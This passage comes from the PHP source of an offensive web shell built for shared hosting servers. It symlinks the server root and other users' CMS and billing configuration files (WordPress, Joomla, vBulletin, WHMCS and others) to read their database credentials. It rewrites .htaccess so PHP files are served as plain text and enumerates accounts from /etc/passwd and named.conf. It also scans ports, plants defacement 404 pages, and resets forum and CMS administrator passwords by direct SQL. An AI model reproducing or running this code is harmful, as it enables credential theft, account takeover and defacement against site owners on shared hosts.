1429 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
1430 $headers=get_headers($hs_status);
1431 if(strpos($headers[0],'200') == true )
1432 $hs_script = "Mybb";
1433 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
1434 $headers=get_headers($hs_status);
1435 if(strpos($headers[0],'200') == true )
1436 $hs_script = "IPB";
1437 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
1438 $headers=get_headers($hs_status);
1439 if(strpos($headers[0],'200') == true )
1440 $hs_script = "SMF";
1441 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
1442 $headers=get_headers($hs_status);
1443 if(strpos($headers[0],'200') == true )
1444 $hs_script = "WHMCS";
1445 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
1446 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
1447 $dcount++;
1448 }
1449 fclose($file);
1450
1451 echo "</table>";
1452 }
1453 else
1454 {
1455 @mkdir("dhanush",0777);
1456 @chdir("dhanush");
1457 execmd("ln -s / root");
1458 $file3 = 'Options all
1459 DirectoryIndex Sux.html
1460 AddType text/plain .php
1461 AddHandler server-parsed .php
1462 AddType text/plain .html
1463 AddHandler txt .html
1464 Require None
1465 Satisfy Any
1466 ';
1467 $fp3 = fopen('.htaccess','w');
1468 $fw3 = fwrite($fp3,$file3);
1469 @fclose($fp3);
1470 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
1471 $temp = "";
1472 $val1 = 0;
1473 $val2 = 1000;
1474 for(;$val1 <= $val2;$val1++)
1475 {
1476 $uid = @posix_getpwuid($val1);
1477 if ($uid)
1478 $temp .= join(':',$uid)."
1479 ";
1480 }
1481 echo '<br/>';
1482 $temp = trim($temp);
1483
1484 $file5 = fopen("test.txt","w");
1485 fputs($file5,$temp);
1486 fclose($file5);
1487
1488 $dcount = 1;
1489 $file = fopen("test.txt", "r");
1490 while(!feof($file))
1491 {
1492 $s = fgets($file);
1493 $matches = array();
1494 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1495 $matches = str_replace("home/","",$matches[1]);
1496 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
1497 $headers=get_headers($hs_status);
1498 if(strpos($headers[0],'200') == true )
1499 $hs_script = "Wordpress";
1500 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
1501 $headers=get_headers($hs_status);
1502 if(strpos($headers[0],'200') == true )
1503 $hs_script = "Wordpress";
1504 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
1505 $headers=get_headers($hs_status);
1506 if(strpos($headers[0],'200') == true )
1507 $hs_script = "Joomla";
1508 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
1509 $headers=get_headers($hs_status);
1510 if(strpos($headers[0],'200') == true )
1511 $hs_script = "Vbulletin";
1512 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
1513 $headers=get_headers($hs_status);
1514 if(strpos($headers[0],'200') == true )
1515 $hs_script = "Vbulletin";
1516 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
1517 $headers=get_headers($hs_status);
1518 if(strpos($headers[0],'200') == true )
1519 $hs_script = "Mybb";
1520 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
1521 $headers=get_headers($hs_status);
1522 if(strpos($headers[0],'200') == true )
1523 $hs_script = "IPB";
1524 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
1525 $headers=get_headers($hs_status);
1526 if(strpos($headers[0],'200') == true )
1527 $hs_script = "SMF";
1528 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
1529 $headers=get_headers($hs_status);
1530 if(strpos($headers[0],'200') == true )
1531 $hs_script = "WHMCS";
1532 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
1533 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
1534 $dcount++;
1535 }
1536 fclose($file);
1537 echo "</table>";
1538 unlink("test.txt");
1539 }
1540 }
1541 }
1542 }
1543 else
1544 echo "<center>Cannot Get Scripts</center>";
1545 }
1546 elseif(isset($_REQUEST["scphp"]))
1547 {
1548 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('phpmanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
1549 <td><a href=javascript:void(0) onClick="getdata('phpscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
1550 </tr></table></center><?php
1551 }
1552 else if(isset($_REQUEST['phpmanuallyscript']))
1553 {
1554 ?>
1555 <center>
1556 <form action="<?php echo $self; ?>" method="post">
1557 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
1558 <input type="button" OnClick="manuallyscriptfn('phpscriptlocator',passwd.value)" value="Get Config" class="but">
1559 </form>
1560 </center>
1561 <?php
1562 }
1563 else if(isset($_REQUEST['phpscriptlocator']))
1564 {
1565 if($os == "Linux")
1566 {
1567 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1568 $path=explode('/',$url);
1569 $url =str_replace($path[count($path)-1],'',$url);
1570 function syml($usern,$pdomain)
1571 {
1572 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1573 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1574 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1575 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1576 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1577 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1578 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1579 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1580 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
1581 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1582 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1583 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1584 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1585 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1586 symlink('/home/'.$usern.'/public_html/bb-config.php',$pdomain.'~~boxbilling.txt');
1587 symlink('/home/'.$usern.'/public_html/billing/bb-config.php',$pdomain.'~~boxbilling.txt');
1588 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1589 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1590 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1591 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1592 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1593 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1594 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1595 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1596 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1597 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1598 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1599 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1600 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1601 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1602 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1603 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1604 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1605 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1606 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1607 }
1608 if(isset($_REQUEST['passwd']))
1609 {
1610 $getetc = trim($_REQUEST['passwd']);
1611
1612 mkdir("dhanushSPT");
1613 chdir("dhanushSPT");
1614 $file3 = 'Options all
1615 DirectoryIndex Sux.html
1616 AddType text/plain .php
1617 AddHandler server-parsed .php
1618 AddType text/plain .html
1619 AddHandler txt .html
1620 Require None
1621 Satisfy Any
1622 ';
1623 $fp3 = fopen('.htaccess','w');
1624 $fw3 = fwrite($fp3,$file3);
1625 @fclose($fp3);
1626 $myfile = fopen("test.txt","w");
1627 fputs($myfile,$getetc);
1628 fclose($myfile);
1629
1630 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1631 while(!feof($file))
1632 {
1633 $s = fgets($file);
1634 $matches = array();
1635 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1636 $matches = str_replace("home/","",$matches[1]);
1637 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1638 continue;
1639 syml($matches,$matches);
1640 }
1641 fclose($file);
1642 unlink("test.txt");
1643 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1644 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3>| Go Here |</font></a></center>";
1645
1646 }
1647 else
1648 {
1649 $d0mains = @file("/etc/named.conf");
1650 if($d0mains)
1651 {
1652 mkdir("dhanushST");
1653 chdir("dhanushST");
1654 $file3 = 'Options all
1655 DirectoryIndex Sux.html
1656 AddType text/plain .php
1657 AddHandler server-parsed .php
1658 AddType text/plain .html
1659 AddHandler txt .html
1660 Require None
1661 Satisfy Any
1662 ';
1663 $fp3 = fopen('.htaccess','w');
1664 $fw3 = fwrite($fp3,$file3);
1665 @fclose($fp3);
1666 foreach($d0mains as $d0main)
1667 {
1668 if(eregi("zone",$d0main))
1669 {
1670 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1671 flush();
1672
1673 if(strlen(trim($domains[1][0])) > 2)
1674 {
1675 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1676
1677 syml($user['name'],$domains[1][0]);
1678 }
1679 }
1680 }
1681 echo "<center><font class=txt>[ Done ]</font></center>";
1682 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font class=txt>| Go Here |</font></a></center>";
1683 }
1684 else
1685 {
1686 mkdir("dhanushSPT");
1687 chdir("dhanushSPT");
1688 $file3 = 'Options all
1689 DirectoryIndex Sux.html
1690 AddType text/plain .php
1691 AddHandler server-parsed .php
1692 AddType text/plain .html
1693 AddHandler txt .html
1694 Require None
1695 Satisfy Any
1696 ';
1697 $fp3 = fopen('.htaccess','w');
1698 $fw3 = fwrite($fp3,$file3);
1699 @fclose($fp3);
1700 $temp = "";
1701 $val1 = 0;
1702 $val2 = 1000;
1703 for(;$val1 <= $val2;$val1++)
1704 {
1705 $uid = @posix_getpwuid($val1);
1706 if ($uid)
1707 $temp .= join(':',$uid)."
1708 ";
1709 }
1710 echo '<br/>';
1711 $temp = trim($temp);
1712
1713 $file5 = fopen("test.txt","w");
1714 fputs($file5,$temp);
1715 fclose($file5);
1716
1717 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1718 while(!feof($file))
1719 {
1720 $s = fgets($file);
1721 $matches = array();
1722 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1723 $matches = str_replace("home/","",$matches[1]);
1724 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1725 continue;
1726 syml($matches,$matches);
1727 }
1728 fclose($file);
1729 echo "</table>";
1730 unlink("test.txt");
1731 echo "<center><font class=txt>[ Done ]</font></center>";
1732 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font class=txt>| Go Here |</font></a></center>";
1733 }
1734 }
1735 }
1736 else
1737 echo "<center>Cannot Complete the task!!!!</center>";
1738 }
1739 else if(isset($_GET["perlsymlink"]))
1740 {
1741 @mkdir("dhanush",0777);
1742 @chdir("dhanush");
1743 $dhanushsym = gzuncompress(base64_decode($plsym));
1744 $fp3 = fopen('dhanushsym.pl','w');
1745 $fw3 = fwrite($fp3,$dhanushsym);
1746 @fclose($fp3);
1747 chmod("dhanushsym.pl", 0755);
1748 ?><center><iframe src="dhanush/dhanushsym.pl" height="400" width="600"></iframe></center><?php
1749 }
1750 else if(isset($_GET["symlinkfile"]))
1751 {
1752 if(!isset($_GET['file']))
1753 {
1754 ?>
1755 <center>
1756 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
1757 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
1758 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
1759 </form></center>
1760 <br><br>
1761 <?php
1762 }
1763 }
1764
1765 else if(isset($_GET['symlinkmyfile']))
1766 {
1767 if($os == "Linux")
1768 {
1769 $fakedir="cx";
1770 $fakedep=16;
1771
1772 $num=0; // offset of symlink.$num
1773
1774 if(!empty($_GET['myfile']))
1775 $file=$_GET['myfile'];
1776 else $file="";
1777
1778 if(empty($file))
1779 exit;
1780
1781 if(!is_writable("."))
1782 echo "not writable directory";
1783
1784 $level=0;
1785
1786 for($as=0;$as<$fakedep;$as++)
1787 {
1788 if(!file_exists($fakedir))
1789 mkdir($fakedir);
1790 chdir($fakedir);
1791 }
1792
1793 while(1<$as--) chdir("..");
1794
1795 $hardstyle = explode("/", $file);
1796
1797 for($a=0;$a<count($hardstyle);$a++)
1798 {
1799 if(!empty($hardstyle[$a]))
1800 {
1801 if(!file_exists($hardstyle[$a]))
1802 mkdir($hardstyle[$a]);
1803 chdir($hardstyle[$a]);
1804 $as++;
1805 }
1806 }
1807 $as++;
1808 while($as--)
1809 chdir("..");
1810
1811 @rmdir("fakesymlink");
1812 @unlink("fakesymlink");
1813
1814 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
1815
1816 // this loop will skip allready created symlinks.
1817 while(1)
1818 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
1819 else $num++;
1820
1821 @unlink("fakesymlink");
1822 mkdir("fakesymlink");
1823
1824 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
1825 }
1826 else
1827 echo '<CENTER>Cannot Create Symlink</CENTER>';
1828 }
1829 else if(isset($_POST['cpaneluser']))
1830 {
1831 if(is_numeric($_POST['noofsubdomain']))
1832 {
1833 for($i=1;$i<=$_POST['noofsubdomain'];$i++)
1834 {
1835 $subDomain = randomt();
1836 echo make_subdomain($subDomain,$_POST['cpaneluser'],$_POST['cpanelpass'],$_POST['subindex']);
1837 }
1838 }
1839 else
1840 echo "Insert number";
1841 }
1842 else if(isset($_REQUEST['404new']))
1843 {
1844 ?>
1845 <form>
1846 <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
1847 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
1848 </br>
1849 </form>
1850 <?php
1851 }
1852 else if(isset($_REQUEST['404page']))
1853 {
1854 $url = $_SERVER['REQUEST_URI'];
1855 $path=explode('/',$url);
1856 $url =str_replace($path[count($path)-1],'',$url);
1857 if(isset($_POST['message']))
1858 {
1859 if($myfile = fopen(".htaccess", "a"))
1860 {
1861 fwrite($myfile, "ErrorDocument 404 ".$url."404.html
1862 ");
1863 if($myfilee = fopen("404.html", "w+"))
1864 {
1865 fwrite($myfilee, $_POST['message']);
1866 }
1867 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1868 }
1869 else
1870 echo "<center>Cannot Set 404 Page</center>";
1871 }
1872 else if(strlen($ind) != 0)
1873 {
1874 if($myfile = fopen(".htaccess", "a"))
1875 {
1876 fwrite($myfile, "ErrorDocument 404 ".$url."404.html
1877 ");
1878
1879 if($myfilee = fopen("404.html", "w+"))
1880 {
1881 fwrite($myfilee, base64_decode($ind));
1882
1883 fclose($myfilee);
1884 echo "<center>Done setting 404 Page !!!!</center>";
1885 }
1886 fclose($myfile);
1887 }
1888 else
1889 {
1890 echo "<center>Cannot Set 404 Page</center>";
1891 }
1892 }
1893 else
1894 echo "<center>Nothing Specified in the shell</center>";
1895 }
1896 else if(isset($_GET["symlink"]))
1897 {
1898 $d0mains = @file("/etc/named.conf");
1899 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1900 $path=explode('/',$url);
1901 $url =str_replace($path[count($path)-1],'',$url);
1902 if($d0mains)
1903 {
1904 @mkdir("dhanush",0777);
1905 @chdir("dhanush");
1906 execmd("ln -s / root");
1907 $file3 = 'Options all
1908 DirectoryIndex Sux.html
1909 AddType text/plain .php
1910 AddHandler server-parsed .php
1911 AddType text/plain .html
1912 AddHandler txt .html
1913 Require None
1914 Satisfy Any
1915 ';
1916 $fp3 = fopen('.htaccess','w');
1917 $fw3 = fwrite($fp3,$file3);
1918 @fclose($fp3);
1919 echo "<table align=center border=1 style='width:60%;' class=tbl><tr><td align=center><font color=#FFFFFF >S. No.</font></td><td align=center><font color=#FFFFFF >Domains</font></td><td align=center><font color=#FFFFFF >Users</font></td><td align=center><font color=#FFFFFF >Symlink</font></td><td align=center><font color=#FFFFFF >Information</font></td></tr>";
1920 $dcount = 1;
1921 foreach($d0mains as $d0main)
1922 {
1923 if(eregi("zone",$d0main))
1924 {
1925 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1926 flush();
1927
1928 if(strlen(trim($domains[1][0])) > 2)
1929 {
1930 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1931
1932 echo "<tr align=center><td><font size=2>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font size=2>".$domains[1][0]."</font></a></td><td><font size=2>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font size=2>Symlink</font></a></td><td><a href=?info=".$domains[1][0]." target=_blank><font size=2>info</font></a></td></tr>"; flush();
1933
1934 $dcount++;
1935 }
1936 }
1937
1938 }
1939 echo "</table>";
1940 }
1941 else
1942 {
1943 if($os == "Linux")
1944 {
1945 ?>
1946 <div style="float:left;position:fixed;">
1947 <form>
1948 <table cellpadding="9">
1949 <tr>
1950 <th colspan="2">Get User Name</th>
1951 </tr>
1952 <tr>
1953 <td>Enter Website Name :</td>
1954 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
1955 </tr>
1956 <tr>
1957 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
1958 </tr>
1959 <tr>
1960 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
1961 </tr>
1962 </table>
1963 </form>
1964 </div>
1965 <?php
1966 $TEST=@file('/etc/passwd');
1967 if ($TEST)
1968 {
1969 @mkdir("dhanush",0777);
1970 @chdir("dhanush");
1971 execmd("ln -s / root");
1972 $file3 = 'Options all
1973 DirectoryIndex Sux.html
1974 AddType text/plain .php
1975 AddHandler server-parsed .php
1976 AddType text/plain .html
1977 AddHandler txt .html
1978 Require None
1979 Satisfy Any
1980 ';
1981 $fp3 = fopen('.htaccess','w');
1982 $fw3 = fwrite($fp3,$file3);
1983 @fclose($fp3);
1984
1985 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";
1986
1987 $dcount = 1;
1988 $file = fopen("/etc/passwd", "r");
1989 //Output a line of the file until the end is reached
1990 while(!feof($file))
1991 {
1992 $s = fgets($file);
1993 $matches = array();
1994 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1995 $matches = str_replace("home/","",$matches[1]);
1996 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1997 continue;
1998 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
1999 echo "<td align=center><font class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2000 $dcount++;
2001 }
2002 fclose($file);
2003
2004 echo "</table>";
2005 }
2006 else
2007 {
2008 @mkdir("dhanush",0777);
2009 @chdir("dhanush");
2010 execmd("ln -s / root");
2011 $file3 = 'Options all
2012 DirectoryIndex Sux.html
2013 AddType text/plain .php
2014 AddHandler server-parsed .php
2015 AddType text/plain .html
2016 AddHandler txt .html
2017 Require None
2018 Satisfy Any
2019 ';
2020 $fp3 = fopen('.htaccess','w');
2021 $fw3 = fwrite($fp3,$file3);
2022 @fclose($fp3);
2023 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";
2024 $temp = "";
2025 $val1 = 0;
2026 $val2 = 1000;
2027 for(;$val1 <= $val2;$val1++)
2028 {
2029 $uid = @posix_getpwuid($val1);
2030 if ($uid)
2031 $temp .= join(':',$uid)."
2032 ";
2033 }
2034 echo '<br/>';
2035 $temp = trim($temp);
2036
2037 $file5 = fopen("test.txt","w");
2038 fputs($file5,$temp);
2039 fclose($file5);
2040
2041 $dcount = 1;
2042 $file = fopen("test.txt", "r");
2043 while(!feof($file))
2044 {
2045 $s = fgets($file);
2046 $matches = array();
2047 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2048 $matches = str_replace("home/","",$matches[1]);
2049 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2050 continue;
2051 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2052 echo "<td align=center><font class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2053 $dcount++;
2054 }
2055 fclose($file);
2056 echo "</table>";
2057 unlink("test.txt");
2058 }
2059 }
2060 else
2061 echo "<center><font >Cannot create Symlink</font></center>";
2062 }
2063 }
2064 else if(isset($_GET['host']) && isset($_GET['protocol']))
2065 {
2066 echo "Open Ports: ";
2067 $host = $_GET['host'];
2068 $proto = $_GET['protocol'];
2069 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
2070 for($current = 0; $current <= 23; $current++)
2071 {
2072 $currents = $myports[$current];
2073 $service = getservbyport($currents, $proto);
2074 // Try to connect to port
2075 $result = fsockopen($host, $currents, $errno, $errstr, 1);
2076 // Show results
2077 if($result)
2078 echo "<font class=txt>$currents, </font>";
2079 }
2080 }
2081 else if(isset($_GET['forumpass']))
2082 {
2083 $localhost = $_GET['f1'];
2084 $database = $_GET['f2'];
2085
2086 $username = $_GET['f3'];
2087 $password = $_GET['f4'];
2088 $prefix = $_GET['prefix'];
2089 $newpass = $_GET['newpass'];
2090 $uid = $_GET['uid'];
2091
2092 if($_GET['forums'] == "vb")
2093 {
2094 $newpass = $_GET['newipbpass'];
2095 $uid = $_GET['ipbuid'];
2096 $con = mysql_connect($localhost,$username,$password);
2097 $db = mysql_select_db($database,$con);
2098 $salt = "eghjghrtd";
2099 $newpassword = md5(md5($newpass) . $salt);
2100 if($prefix == "" || $prefix == null)
2101 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
2102 else
2103 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
2104 if($sql)
2105 {
2106 mysql_close($con);
2107 echo "<font class=txt>Password Changed Successfully</font>";
2108 }
2109 else
2110 echo "Cannot Change Password";
2111 }
2112 if($_GET['forums'] == "mybb")
2113 {
2114 $newpass = $_GET['newipbpass'];
2115 $uid = $_GET['ipbuid'];
2116 $con = mysql_connect($localhost,$username,$password);
2117 $db = mysql_select_db($database,$con);
2118 $salt = "jeghj";
2119 $newpassword = md5(md5($salt).md5($newpass));
2120 if($prefix == "" || $prefix == null)
2121 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
2122 else
2123 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
2124 if($sql)
2125 {
2126 mysql_close($con);
2127 echo "<font class=txt>Password Changed Successfully</font>";
2128 }
2129 else
2130 echo "Cannot Change Password";
2131 }
2132 if($_GET['forums'] == "smf")
2133 {
2134 $newpass = $_GET['newipbpass'];
2135 $uid = $_GET['ipbuid'];
2136 $con = mysql_connect($localhost,$username,$password);
2137 $db = mysql_select_db($database,$con);
2138 $salt = "eghj";
2139
2140 if($prefix == "" || $prefix == null)
2141 {
2142 $result = mysql_query("select member_name from smf_members where id_member = '$uid'");
2143 $row = mysql_fetch_array($result);
2144 $membername = $row['member_name'];
2145 $newpassword = sha1(strtolower($membername).$newpass);
2146 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
2147 }
2148 else
2149 {
2150 $result = mysql_query("select member_name from ".$prefix."members where id_member = '$uid'");
2151 $row = mysql_fetch_array($result);
2152 $membername = $row['member_name'];
2153 $newpassword = sha1(strtolower($membername).$newpass);
2154 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
2155 }
2156 if($sql)
2157 {
2158 mysql_close($con);
2159 echo "<font class=txt>Password Changed Successfully</font>";
2160 }
2161 else
2162 echo "Cannot Change Password";
2163 }
2164 if($_GET['forums'] == "phpbb")
2165 {
2166 $newpass = $_GET['newipbpass'];
2167 $uid = $_GET['ipbuid'];
2168 $con = mysql_connect($localhost,$username,$password);
2169 $db = mysql_select_db($database,$con);
2170
2171 $newpassword = md5($newpass);
2172 if(empty($prefix) || $prefix == null)
2173 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
2174 else
2175 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
2176 if($sql)
2177 {
2178 mysql_close($con);
2179 echo "<font class=txt>Password Changed Successfully</font>";
2180 }
2181 else
2182 echo "Cannot Change Password";
2183 }
2184 if($_GET['forums'] == "ipb")
2185 {
2186 $newpass = $_GET['newipbpass'];
2187 $uid = $_GET['ipbuid'];
2188 $con = mysql_connect($localhost,$username,$password);
2189 $db = mysql_select_db($database,$con);
2190 $salt = "eghj";
2191 $newpassword = md5(md5($salt).md5($newpass));
2192 if($prefix == "" || $prefix == null)
2193 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
2194 else
2195 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
2196 if($sql)
2197 {
2198 mysql_close($con);
2199 echo "<font class=txt>Password Changed Successfully</font>";
2200 }
2201 else
2202 echo "Cannot Change Password";
2203 }
2204 if($_GET['forums'] == "wp")
2205 {
2206 $uname = $_GET['uname'];
2207
2208 $con = mysql_connect($localhost,$username,$password);
2209 $db = mysql_select_db($database,$con);
2210 $newpassword = md5($newpass);
2211 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname'");
2212 if($sql)
2213 {
2214 mysql_close($con);
2215 echo "<font class=txt>Password Changed Successfully</font>";
2216 }
2217 else
2218 echo "Cannot Change Password";
2219 }
2220 if($_GET['forums'] == "joomla")
2221 {
2222 $newjoomlapass = $_GET['newjoomlapass'];
2223 $joomlauname = $_GET['username'];
2224 $con = mysql_connect($localhost,$username,$password);
2225 $db = mysql_select_db($database,$con);
2226 $newpassword = md5($newjoomlapass);
2227 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname'");
2228 if($sql)
2229 {
2230 mysql_close($con);
2231 echo "<font class=txt>Password Changed Successfully</font>";
2232 }
2233 else
2234 echo "Cannot Change Password";
2235 }
2236 }
2237 else if(isset($_POST['forumdeface']))
2238 {
2239 $localhost = $_POST['f1'];
2240 $database = $_POST['f2'];
2241 $username = $_POST['f3'];
2242 $password = $_POST['f4'];
2243 $index = $_POST['index'];
2244 $prefix = $_POST['tableprefix'];
2245
